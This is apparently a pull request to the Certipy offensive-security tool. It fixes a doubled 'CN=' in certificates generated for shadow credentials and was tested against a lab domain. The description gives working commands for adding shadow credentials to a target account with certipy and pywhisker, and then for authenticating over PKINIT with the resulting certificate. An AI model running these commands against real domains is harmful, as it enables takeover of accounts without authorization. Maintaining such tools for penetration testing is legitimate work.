### PR TITLE
Fix subject in generated certificate of shadow credentials

### DIFF
--- a/certipy/commands/shadow.py
+++ b/certipy/commands/shadow.py
@@ -129,7 +129,7 @@ class Shadow:
         self, target_dn: str, user: LDAPEntry
     ) -> Tuple[X509Certificate2, KeyCredential, List[bytes], str]:
         cert, key_credential, device_id = self.generate_key_credential(
-            target_dn, "CN=%s" % user.get("sAMAccountName")
+            target_dn, "%s" % user.get("sAMAccountName")
         )
 
         if self.verbose:


### PR DESCRIPTION
I had a recent engagement where shadow credentials were registered with a command like:
```
$ certipy shadow add -dc-ip 10.5.10.11 -scheme ldaps -u domainadmin@ludus.domain -p password -account domainuser
```

However, authentication attempts over PKINIT would fail with (this is not the case in the Ludus environment):
```
[-] Name mismatch between certificate and user 'domainuser'
```

While investigating the generated certificate, it was noticed that the Subject contained a double `CN=CN=`.
This is due to the fact that the underlying [pydsinternals](https://github.com/p0dalirius/pydsinternals/blob/d6d9943fede306aeff8ef589348675a02bab788c/dsinternals/common/cryptography/X509Certificate2.py#L33) library, internally assigns the `CN` property (not the whole subject).
```
$ openssl x509 -in domainuser.pfx -text | grep CN=CN=
        Issuer: CN=CN=domainuser
        Subject: CN=CN=domainuser
```

After applying the proposed changes, the certificate looks like this:
```		
$ openssl x509 -in domainuser.pfx -text | grep CN=
        Issuer: CN=domainuser
        Subject: CN=domainuser
```

This matches the behavior of e.g. pywhisker (and impacket's ldap-shell, ntlmrelayx, ...):
```
$ pywhisker --dc-ip 10.5.10.11 -d ludus.domain -u domainadmin -p password --target domainuser --action add --filename pywhisker -P ''
```

Whose generated certificate looks like this:
```
$ openssl x509 -in pywhisker.pfx -text | grep CN=
        Issuer: CN=domainuser
        Subject: CN=domainuser
```

Authentication using PKINIT was tested and worked as expected with a command like:
```
$ certipy auth -dc-ip 10.5.10.11 -pfx domainuser.pfx -username domainuser -domain ludus.domain -no-hash
```